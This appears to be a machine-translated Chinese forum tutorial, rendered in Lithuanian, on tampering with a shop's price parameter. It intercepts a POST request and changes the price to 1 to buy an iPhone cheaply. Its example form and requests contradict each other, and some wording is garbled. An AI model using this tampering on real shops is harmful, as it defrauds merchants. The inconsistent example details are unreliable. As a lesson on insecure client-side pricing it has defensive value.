Šis straipsnis yra veidrodinis mašininio vertimo straipsnis, spauskite čia norėdami pereiti prie originalaus straipsnio.

Architect_Programmer_Code žemės ūkio tinklas»Architektas Kitos technologijos Saugus puolimas ir gynyba Įsibrovimo įsiskverbimas: HTTP antraščių taikymas
Rodinys: 12586|Atsakyti: 0

[Saugos pamoka] Įsibrovimo įsiskverbimas: HTTP antraščių taikymas

[Kopijuoti nuorodą]
Paskelbta 2015-02-07 17:59:07 | | |

Apie HTTP antraščių taikymą

http antraštė dažniausiai naudojama svetainių perdavimo mechanizme, tačiau dauguma pradedančiųjų Kinijoje šio kūrinio nepastebėjo, šis straipsnis skirtas tik pradedantiesiems, http antraštės vaidmuo įsilaužimo procese.

Kaip pavyzdį paimkite apsipirkimo puslapį, kad išanalizuotumėte nedidelę HTTP antraščių vaidmens dalį.

Pirmiausia išanalizuokime formą apsipirkimo puslapyje.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="hidden" name="price" value="449">

<input type="submit" value="Pirkti">

</form>

Atidarymo metu padarykite jo http pranešimo antraštės ekrano kopiją ir pažiūrėkite

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

Kiekis=1&Kaina=2400

Nors kainos laukas nerodomas puslapyje atidarant apsipirkimo puslapį, vartotojas vis tiek gali jį redaguoti ir valdyti.

Yra du būdai redaguoti

1. Išsaugokite HTML šaltinio kodą modifikavimui, tada iš naujo įkelkite jį į naršyklę, kad paleistumėte

2. Naudokite tarpinio serverio perėmimą, kad modifikuotumėte HTTP antraštes (tarpinio serverio konstrukcija įrankio burp)

Kaip pavyzdį paimkite aukščiau pateiktą HTTP antraštę
Prieš pakeitimą
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

Kiekis=1&Kaina=2400

Po pakeitimo
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

Kiekis=1&Kaina=1


Paskutinėje eilutėje lauke Kaina yra 2400 vertė ir jei pakeisime ją į 1, galime gauti "iPhone 4S" pigiau.

Šiame straipsnyje pateikiama tik netikėtų laimėjimų, tokių kaip LDAP injekcija, idėja.




Ankstesnis:MySQL pamiršo slaptažodžio atkūrimo slaptažodžio įgyvendinimo metodas
Kitą:SQL injekcija, kad gautumėte visą svetainės kelią

Susijusios žinutės
Atsakomybės apribojimas:
Visa programinė įranga, programavimo medžiaga ar straipsniai, kuriuos skelbia Code Farmer Network, yra skirti tik mokymosi ir mokslinių tyrimų tikslams; Aukščiau nurodytas turinys negali būti naudojamas komerciniais ar neteisėtais tikslais, priešingu atveju vartotojai prisiima visas pasekmes. Šioje svetainėje pateikiama informacija gaunama iš interneto, o ginčai dėl autorių teisių neturi nieko bendra su šia svetaine. Turite visiškai ištrinti aukščiau pateiktą turinį iš savo kompiuterio per 24 valandas nuo atsisiuntimo. Jei jums patinka programa, palaikykite autentišką programinę įrangą, įsigykite registraciją ir gaukite geresnes autentiškas paslaugas. Jei yra kokių nors pažeidimų, susisiekite su mumis el. paštu.
Mail To:help@itsvse.com